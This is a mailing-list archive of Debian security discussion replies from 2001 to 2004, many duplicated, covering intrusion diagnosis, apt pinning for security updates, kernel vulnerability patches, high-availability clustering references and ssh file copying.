D6F6 3A0D 8AA0 60F4 1216 Every program in development at MIT expands until it can read mail. -- Unknown -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: apache / exe process taking 99 % cpu
On Mon, Aug 30, 2004 at 03:50:35PM +0200, Timo Veith wrote: My question is, have I been hacked? Probably. Do you run PHP? Buggy PHP scripts are a common attack vector these days. Could that be a CGI program gone wild? Yes, if the pid changes you noted are just independent processes. Less likely, if these are intentional fork()/exit() tricks done by one process (of course unless you don't trust your users). Of course I could stop apache, but that's not what I want. I'd like to figure out where this comes from. try ls -l /proc/PID and ls -l /proc/PID/fd, these may reveal some useful information. Also run chkrootkit. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: apt-get upgrade and kernel images
On Tue, Mar 02, 2004 at 10:18:15AM +0200, Riku Valli wrote: Yes, but for me was quite confusing that at first installation kernel isnot a package. AFAIK it will be, starting with sarge. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: apt-get upgrade and kernel images
On Tue, Mar 02, 2004 at 10:18:15AM +0200, Riku Valli wrote: Yes, but for me was quite confusing that at first installation kernel isnot a package. AFAIK it will be, starting with sarge. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: services installed and running out of the box
On Fri, Sep 26, 2003 at 02:06:01PM -0400, Matt Zimmerman wrote: He wants the service, he just wants it only for local use. That is not something that should be handled at the package level. Why not? The boot-floppies already set the locale for the whole system. I think it would be nice if there was a global setting stating whether all services should be local-only or available to the outside. Of course it would mean (ab)using debconf in every such package... regards Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: services installed and running out of the box
On Fri, Sep 26, 2003 at 02:06:01PM -0400, Matt Zimmerman wrote: He wants the service, he just wants it only for local use. That is not something that should be handled at the package level. Why not? The boot-floppies already set the locale for the whole system. I think it would be nice if there was a global setting stating whether all services should be local-only or available to the outside. Of course it would mean (ab)using debconf in every such package... regards Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: ProFTPD ASCII File Remote Compromise Vulnerability
On Tue, Sep 23, 2003 at 04:13:02PM -0500, Jeff Bender wrote: Thanks. Do you happen to have a link where this might be posted? http://bugs.debian.org/212416 Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: ProFTPD ASCII File Remote Compromise Vulnerability
On Tue, Sep 23, 2003 at 04:13:02PM -0500, Jeff Bender wrote: Thanks. Do you happen to have a link where this might be posted? http://bugs.debian.org/212416 Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
security updates vs. proposed-updates
Hi! Many people asked (in messages to [EMAIL PROTECTED]) how to get the security updates when there's a newer version of the package in question in proposed-updates, so I thought that posting this here could be useful. Here's the way I do it recently: Add (for every package you need) an entry like this into /etc/apt/preferences: Explanation: override stable-updates/stable-security desync Package: ssh Pin: release l=Debian-Security Pin-Priority: 1001 This seems to work better then othe suggested ways: - puting the package on hold (you need to override it when the security update is updated again) - removing proposed-updates from sources.list (2.4.x kernels from Herbert are there) Maybe this could be added to the security team FAQ? Disclaimer: I'm not a member of the security team. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 signature.asc Description: Digital signature
security updates vs. proposed-updates
Hi! Many people asked (in messages to [EMAIL PROTECTED]) how to get the security updates when there's a newer version of the package in question in proposed-updates, so I thought that posting this here could be useful. Here's the way I do it recently: Add (for every package you need) an entry like this into /etc/apt/preferences: Explanation: override stable-updates/stable-security desync Package: ssh Pin: release l=Debian-Security Pin-Priority: 1001 This seems to work better then othe suggested ways: - puting the package on hold (you need to override it when the security update is updated again) - removing proposed-updates from sources.list (2.4.x kernels from Herbert are there) Maybe this could be added to the security team FAQ? Disclaimer: I'm not a member of the security team. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 signature.asc Description: Digital signature
Re: Accepted kernel-source-2.4.20 2.4.20-3woody.12 (all source)
On Wed, Sep 10, 2003 at 08:32:32AM -0400, Herbert Xu wrote: Changes: kernel-source-2.4.20 (2.4.20-3woody.12) stable; urgency=low . * Fixed conntrack DoS (netfilter): . include/linux/netfilter_ipv4/ip_conntrack.h . net/ipv4/netfilter/ip_conntrack_core.c . net/ipv4/netfilter/ip_conntrack_proto_tcp.c . net/ipv4/netfilter/ip_conntrack_proto_udp.c . net/ipv4/netfilter/ip_conntrack_standalone.c I guess this a fix for one of the vulnerabilities announced by netfilter team at the beginning of August: http://lists.netfilter.org/pipermail/netfilter-devel/2003-August/012151.html (Conntrack list_del() DoS) How about the second message posted on the same day? (NAT Remote DOS (SACK mangle)): http://lists.netfilter.org/pipermail/netfilter-devel/2003-August/012152.html Herbert, aren't you going to patch it as well? Or maybe this is the bug fixed in kernel-source-2.4.3 (2.4.3-4), back in April (Bug#94216)? (The urls in the bug report are not valid any more, so I can't check.) regards, Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Curriculum
On Fri, Aug 08, 2003 at 11:47:09AM +0200, Matteo Vescovi wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Friday 08 August 2003 06:10, Hugo Kavamura wrote: Hugo Kazumi Kavamura [...] What the h.ll does this mean? Apparently some moron tries to find a job through SPAMming. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Curriculum
On Fri, Aug 08, 2003 at 11:47:09AM +0200, Matteo Vescovi wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Friday 08 August 2003 06:10, Hugo Kavamura wrote: Hugo Kazumi Kavamura [...] What the h.ll does this mean? Apparently some moron tries to find a job through SPAMming. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: Kernel 2.4.21 Forwarding table vulnerability
On Mon, Jul 28, 2003 at 11:38:51AM -0700, Bruce Banner wrote: When were they patched? And how do I know when they are patched and when they are available? Is there somewhere I can find this info? You could subscribe to [EMAIL PROTECTED] See http://lists.debian.org/debian-changes/ Marcin PS: please reply _below_ the citation and cut unneeded text. -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: Kernel 2.4.21 Forwarding table vulnerability
On Mon, Jul 28, 2003 at 11:38:51AM -0700, Bruce Banner wrote: When were they patched? And how do I know when they are patched and when they are available? Is there somewhere I can find this info? You could subscribe to debian-changes@lists.debian.org See http://lists.debian.org/debian-changes/ Marcin PS: please reply _below_ the citation and cut unneeded text. -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: evolution
On Thu, Jun 26, 2003 at 08:40:38AM +0300, Martynas Domarkas wrote: Hi, it's me again and I have another stupid question: my evolution mailer in a short period of time repeatedly tries connect to some strange hosts: tcp 0 1 192.168.0.1:33931 205.156.51.200:80 SYN_SENT [...] I don't use evolution, but if it displays HTML messages, those could be requests to retrieve some objects embedded in some messages (images for example). Just a thought. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: evolution
On Thu, Jun 26, 2003 at 08:40:38AM +0300, Martynas Domarkas wrote: Hi, it's me again and I have another stupid question: my evolution mailer in a short period of time repeatedly tries connect to some strange hosts: tcp 0 1 192.168.0.1:33931 205.156.51.200:80 SYN_SENT [...] I don't use evolution, but if it displays HTML messages, those could be requests to retrieve some objects embedded in some messages (images for example). Just a thought. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
DSA-288 - a question
Hi! DSA 288 [0] says: ] You will have to decide whether you want the security update which is ] not thread-safe and recompile all applications that apparently fail ^^ ] after the upgrade, [...] Does that mean that installing 0.9.6c-2.woody.3 and then recompiling e.g. stunnel against it will make it work fine even though openssl won't be thread-safe? If so, can anyone explain how recompiling an application can help? (There are no differences in the library interface between openssl-0.9.6c-2.woody.2 and openssl-0.9.6c-2.woody.3) If not, then what does it refer to, and is there any way to make threaded apps work with openssl 0.9.6c-2.woody.3? regards Marcin [0] http://www.debian.org/security/2003/dsa-288 -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: scan
On Thu, Apr 10, 2003 at 02:33:59PM -0300, danilo lujambio wrote: When I scanned with nmap this server , it shuted down and rebooted. Did it go through runlevel 6, or just simply crashed? If it was the latter, then it's probably broken hardware (it didn't reboot when scanning localhost, because lo is a software-only interface). Try pingflooding it (ping -f) and see if it crashes. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: [Fwd: Re: LWN: Ptrace vulnerability in 2.2 and 2.4 kernels]
On Tue, Apr 01, 2003 at 02:30:17PM +0100, Dale Amon wrote: On Tue, Apr 01, 2003 at 03:36:15PM +0200, Maurizio Lemmo - Tannoiser wrote: In a server enviroment, where there no need to load modules at run-time, could be a usable workaorund, but, in a workstation machine, i don't think thats a great idea. In a server environment it is preferable not to compile with modules at all. Why? Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: [Fwd: Re: LWN: Ptrace vulnerability in 2.2 and 2.4 kernels]
On Tue, Apr 01, 2003 at 02:30:17PM +0100, Dale Amon wrote: On Tue, Apr 01, 2003 at 03:36:15PM +0200, Maurizio Lemmo - Tannoiser wrote: In a server enviroment, where there no need to load modules at run-time, could be a usable workaorund, but, in a workstation machine, i don't think thats a great idea. In a server environment it is preferable not to compile with modules at all. Why? Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: howcome there's no DSA for the latest Linux ptrace hole?
On Thu, Mar 20, 2003 at 05:29:56PM -0800, Jon wrote: On Thu, 2003-03-20 at 14:50, Tom Goulet (UID0) wrote: Are the Debian kernels vulnerable to this hole? This post to BugTraq by Andrzej Szombierski (who found the problem) includes a sample exploit for x86. You can use it to see if you are vulnerable. Isn't it the same bug for which Alan Cox (IIRC) provided a patch recently (which was applied to kernel-source-2.4.20 version 2.4.20-3woody.2)? http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00021.html The exploit linked to from the mentioned post doesn't give me root on a box with this kernel... Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: howcome there's no DSA for the latest Linux ptrace hole?
On Thu, Mar 20, 2003 at 05:29:56PM -0800, Jon wrote: On Thu, 2003-03-20 at 14:50, Tom Goulet (UID0) wrote: Are the Debian kernels vulnerable to this hole? This post to BugTraq by Andrzej Szombierski (who found the problem) includes a sample exploit for x86. You can use it to see if you are vulnerable. Isn't it the same bug for which Alan Cox (IIRC) provided a patch recently (which was applied to kernel-source-2.4.20 version 2.4.20-3woody.2)? http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00021.html The exploit linked to from the mentioned post doesn't give me root on a box with this kernel... Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: machine monitoring packages
On Fri, Feb 14, 2003 at 05:00:42PM +0100, Dariush Pietrzak wrote: Goes like this: what is some tool and plot graphs... Why it's mrtg/rrdtool. It's great. But there is no alternative. And there should be. What's wrong with gnuplot? This is getting so off-topic... Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: machine monitoring packages
On Fri, Feb 14, 2003 at 05:00:42PM +0100, Dariush Pietrzak wrote: Goes like this: what is some tool and plot graphs... Why it's mrtg/rrdtool. It's great. But there is no alternative. And there should be. What's wrong with gnuplot? This is getting so off-topic... Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: snort-stats without mailing...
On Thu, Feb 13, 2003 at 12:15:55AM +, Ricardo Sousa wrote: How can i send/view snort stats without mailing them ?!? ssh-keygen and scp is one way Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: snort-stats without mailing...
On Thu, Feb 13, 2003 at 12:15:55AM +, Ricardo Sousa wrote: How can i send/view snort stats without mailing them ?!? ssh-keygen and scp is one way Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216
Re: cluster on firewall?
On Thu, Feb 06, 2003 at 03:09:34AM +0200, Haim Ashkenazi wrote: Now, since the firewall is the most critical host, I want to setup some kind of failsafe, so even if that host dies all the traffic will go through another host. Since I don't even have an idea where to start, I'll appreciate any ideas/comments/pointers to documentations, etc... What you are looking for is called a High-Availability Cluster (HAC). I don't maintain one myself, but have recently written a paper about HAC (only in Polish, sorry), and it looks like there is some really nice software for that. Below are the links from my paper -- some dates are in Polish, but that shouldn't be a problem. [1] High-availability linux project, pazdziernik 2002. http://linux-ha.org/. [2] Harald Milz (hm AT seneca.muc.de). Linux high availability HOWTO, grudzien 1998. http://www.ibiblio.org/pub/Linux/ALPHA/linux-ha/ High-Availability-HOWTO.html. [3] Rudy Pawul (rpawul AT iso ne.com). Getting started with Linux-HA (heartbeat), 2000. http://linux-ha.org/download/GettingStarted.html. [4] Alan Robertson (alanr AT unix.sh). Linux-ha APIs. Talk given at LWCE/NYC in February, 2001. http://linux-ha.org/heartbeat/LWCE-NYC-2001/index. html. [5] Alan Robertson (alanr AT unix.sh). Implementing HA servers on Linux a brief tutorial on the Linux-HA heartbeat software. http://linux-ha.org/ heartbeat/DevDen2002.pdf. [6] Steve Blackmon (steve.blackmon AT transtech.cc). High-availability file server with heartbeat, 2001. http://www.samag.com/documents/s=1146/sam0109c/ 0109c.htm. [7] Ram Pai. Heartbeat API. http://linux-ha.org/heartbeat/heartbeat_api. html. [8] Horms (Simon Horman) (horms AT verge.net.au). Fake home page, 2002. http: //www.vergenet.net/linux/fake/. [9] Alan Robertson (alanr AT suse.com). Linux-HA heartbeat system design, 2000. http://www.linuxshowcase.org/2000/2000papers/papers/robertson/. [10] Richard Ferri (rcferri AT us.ibm.com). Conversations: Introducing the open clu-ster framework, wrzesien 2002. http://www.linuxjournal.com/article.php? sid=6143. [11] Ip load balancing (piranha), 2002. http://www.redhat.com/software/ advancedserver/technical/piranha.html. [12] Linux virtual server home page. http://www.linuxvirtualserver.org/. [13] Joseph Mack (jmack AT wm7d.net). LVS-mini-HOWTO, listopad 2002. http://www.linuxvirtualserver.org/Joseph.Mack/mini-HOWTO/ LVS-mini-HOWTO.html. [14] mon home page, 2002. http://www.kernel.org/software/mon/. [15] Keepalived home page, 2002. http://keepalived.sourceforge.net/. [16] RFC2338 virtual router redundancy protocol. http://www.ietf.org/rfc/ rfc2338.txt. [17] Alexandre Cassen (acassen AT linux vs.org). Keepalived user guide, 2002. http: //keepalived.sourceforge.net/pdf/UserGuide.pdf. [18] Horms (Simon Horman) (horms AT verge.net.au). Creating linux web farms (linux high availability and scalability), listopad 2000. http://verge.net.au/linux/ has/. [19] Horms (Simon Horman) (horms AT verge.net.au). Ultra monkey project home page, 2002. http://www.ultramonkey.org/. [20] Inc Mission Critical Linux. Mission critical linux website, 2002. http://www. missioncriticallinux.com/. [21] Mission critical linux to deliver the first clustering solution specifically developed for e-commerce, marzec 2002. http://linuxpr.com/releases/1488.html. [22] Motorola Computer Group. Advanced high availability services for linux, 2002. http://mcg.motorola.com/cfm/templates/swdetail.cfm?PageID= 682PageTypeID=10SoftwareID=6ProductID=202. [23] Charles de Tranaltes. The road to six nines (6NINES) availability, luty 2002. http://mcg.motorola.com/wp/index.cfm?pagetypeid=35source=6. [24] HP high-availability software, 2002. http://www.hp.com/products1/unix/ highavailability/. [25] Global filesystem home page. http://www.globalfilesystem.org/. [26] Alan Robertson (alanr AT us.ibm.com). Resource fencing using STONITH. http: //linux-ha.org/heartbeat/ResourceFencing_Stonith.html. [27] Non-stop authentication with linux clusters. http://www-1.ibm.com/ servers/esdd/articles/linux_clust/index.html. [28] Coda filesystem home page, 2002. http://www.coda.cs.cmu.edu/. [29] Inter Mezzo filesystem home page, 2002. http://inter-mezzo.org/. [30] Bill von Hagen (vonhagen AT vonhagen.org). Using the InterMezzo distributed filesystem getting connected in a disconnected world, 2002. http://www. linuxplanet.com/linuxplanet/reports/4368/1/. [31] OCF. Open Cluster Framework project home page, 2002. http://opencf. org/. [32] VA Cluster Manager project home page, 2002. http://vacm.sourceforge. net/. [33] Philipp Reisner (philipp.reisner AT gmx.at). DRBD home page, 2002. http: //www.complang.tuwien.ac.at/reisner/drbd/. [34] Pavel Machek. NBD project home page. http://nbd.sourceforge.net/. [35] Peter Breuer. Enhanced NBD project home page. http://www.xss.co.at/ linux/NBD/. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA
Re: cluster on firewall?
On Thu, Feb 06, 2003 at 03:09:34AM +0200, Haim Ashkenazi wrote: Now, since the firewall is the most critical host, I want to setup some kind of failsafe, so even if that host dies all the traffic will go through another host. Since I don't even have an idea where to start, I'll appreciate any ideas/comments/pointers to documentations, etc... What you are looking for is called a High-Availability Cluster (HAC). I don't maintain one myself, but have recently written a paper about HAC (only in Polish, sorry), and it looks like there is some really nice software for that. Below are the links from my paper -- some dates are in Polish, but that shouldn't be a problem. [1] High-availability linux project, pazdziernik 2002. http://linux-ha.org/. [2] Harald Milz (hm AT seneca.muc.de). Linux high availability HOWTO, grudzien 1998. http://www.ibiblio.org/pub/Linux/ALPHA/linux-ha/ High-Availability-HOWTO.html. [3] Rudy Pawul (rpawul AT iso ne.com). Getting started with Linux-HA (heartbeat), 2000. http://linux-ha.org/download/GettingStarted.html. [4] Alan Robertson (alanr AT unix.sh). Linux-ha APIs. Talk given at LWCE/NYC in February, 2001. http://linux-ha.org/heartbeat/LWCE-NYC-2001/index. html. [5] Alan Robertson (alanr AT unix.sh). Implementing HA servers on Linux a brief tutorial on the Linux-HA heartbeat software. http://linux-ha.org/ heartbeat/DevDen2002.pdf. [6] Steve Blackmon (steve.blackmon AT transtech.cc). High-availability file server with heartbeat, 2001. http://www.samag.com/documents/s=1146/sam0109c/ 0109c.htm. [7] Ram Pai. Heartbeat API. http://linux-ha.org/heartbeat/heartbeat_api. html. [8] Horms (Simon Horman) (horms AT verge.net.au). Fake home page, 2002. http: //www.vergenet.net/linux/fake/. [9] Alan Robertson (alanr AT suse.com). Linux-HA heartbeat system design, 2000. http://www.linuxshowcase.org/2000/2000papers/papers/robertson/. [10] Richard Ferri (rcferri AT us.ibm.com). Conversations: Introducing the open clu-ster framework, wrzesien 2002. http://www.linuxjournal.com/article.php? sid=6143. [11] Ip load balancing (piranha), 2002. http://www.redhat.com/software/ advancedserver/technical/piranha.html. [12] Linux virtual server home page. http://www.linuxvirtualserver.org/. [13] Joseph Mack (jmack AT wm7d.net). LVS-mini-HOWTO, listopad 2002. http://www.linuxvirtualserver.org/Joseph.Mack/mini-HOWTO/ LVS-mini-HOWTO.html. [14] mon home page, 2002. http://www.kernel.org/software/mon/. [15] Keepalived home page, 2002. http://keepalived.sourceforge.net/. [16] RFC2338 virtual router redundancy protocol. http://www.ietf.org/rfc/ rfc2338.txt. [17] Alexandre Cassen (acassen AT linux vs.org). Keepalived user guide, 2002. http: //keepalived.sourceforge.net/pdf/UserGuide.pdf. [18] Horms (Simon Horman) (horms AT verge.net.au). Creating linux web farms (linux high availability and scalability), listopad 2000. http://verge.net.au/linux/ has/. [19] Horms (Simon Horman) (horms AT verge.net.au). Ultra monkey project home page, 2002. http://www.ultramonkey.org/. [20] Inc Mission Critical Linux. Mission critical linux website, 2002. http://www. missioncriticallinux.com/. [21] Mission critical linux to deliver the first clustering solution specifically developed for e-commerce, marzec 2002. http://linuxpr.com/releases/1488.html. [22] Motorola Computer Group. Advanced high availability services for linux, 2002. http://mcg.motorola.com/cfm/templates/swdetail.cfm?PageID= 682PageTypeID=10SoftwareID=6ProductID=202. [23] Charles de Tranaltes. The road to six nines (6NINES) availability, luty 2002. http://mcg.motorola.com/wp/index.cfm?pagetypeid=35source=6. [24] HP high-availability software, 2002. http://www.hp.com/products1/unix/ highavailability/. [25] Global filesystem home page. http://www.globalfilesystem.org/. [26] Alan Robertson (alanr AT us.ibm.com). Resource fencing using STONITH. http: //linux-ha.org/heartbeat/ResourceFencing_Stonith.html. [27] Non-stop authentication with linux clusters. http://www-1.ibm.com/ servers/esdd/articles/linux_clust/index.html. [28] Coda filesystem home page, 2002. http://www.coda.cs.cmu.edu/. [29] Inter Mezzo filesystem home page, 2002. http://inter-mezzo.org/. [30] Bill von Hagen (vonhagen AT vonhagen.org). Using the InterMezzo distributed filesystem getting connected in a disconnected world, 2002. http://www. linuxplanet.com/linuxplanet/reports/4368/1/. [31] OCF. Open Cluster Framework project home page, 2002. http://opencf. org/. [32] VA Cluster Manager project home page, 2002. http://vacm.sourceforge. net/. [33] Philipp Reisner (philipp.reisner AT gmx.at). DRBD home page, 2002. http: //www.complang.tuwien.ac.at/reisner/drbd/. [34] Pavel Machek. NBD project home page. http://nbd.sourceforge.net/. [35] Peter Breuer. Enhanced NBD project home page. http://www.xss.co.at/ linux/NBD/. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote: Hi there! I've read a srtange info at http://www3.ca.com/Virus/Virus.asp?ID=11513 is it true? can it infect my debian systems? (woody, sid, potato)? how? If you run an infected file - yes. Otherwise - i don't think so (they don't say if it exploits any vulnerabilities other than user's stupidity/ignorance). Basically, if you run binaries from an unsafe source, you get what you deserve. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 10, 2002 at 06:24:01PM +0200, Narancs v1 wrote: Hi there! I've read a srtange info at http://www3.ca.com/Virus/Virus.asp?ID=11513 is it true? can it infect my debian systems? (woody, sid, potato)? how? If you run an infected file - yes. Otherwise - i don't think so (they don't say if it exploits any vulnerabilities other than user's stupidity/ignorance). Basically, if you run binaries from an unsafe source, you get what you deserve. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: scp and sftp
On Mon, Apr 01, 2002 at 10:04:50AM -0300, Pedro Zorzenon Neto wrote: With the following commands, you can copy files without scp: $ cat localfile | ssh somehost cat /somedir/remotefile $ ssh somehost cat /somedir/remotefile localfile So, it seems unusefull to disable scp and enable ssh... You might want to enable ssh with /usr/bin/passwd as user's shell. Disabling scp then seems to make sense. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: scp and sftp
On Mon, Apr 01, 2002 at 10:04:50AM -0300, Pedro Zorzenon Neto wrote: With the following commands, you can copy files without scp: $ cat localfile | ssh somehost cat /somedir/remotefile $ ssh somehost cat /somedir/remotefile localfile So, it seems unusefull to disable scp and enable ssh... You might want to enable ssh with /usr/bin/passwd as user's shell. Disabling scp then seems to make sense. Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: MTAs
On Sun, Nov 18, 2001 at 03:02:30PM +1000, Paul Haesler wrote: it is a Good Thing to have an MTA which does not run as root. I found the argument persuasive, and happily installed postifx. I do miss one thing from exim, however. Default debian installation of exim runs as mail: [paul@marge procmail] grep exim /etc/inetd.conf smtpstream tcp nowait mail/usr/sbin/exim exim -bs I don't know much about exim's guts, but is there a point in starting it as mail if it's SUID root? -rwsr-xr-x1 root root 466308 sie 15 01:13 /usr/sbin/exim Marcin -- Marcin Owsiany [EMAIL PROTECTED] http://marcin.owsiany.pl/ GnuPG: 1024D/60F41216 FE67 DA2D 0ACA FC5E 3F75 D6F6 3A0D 8AA0 60F4 1216 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: MTAs
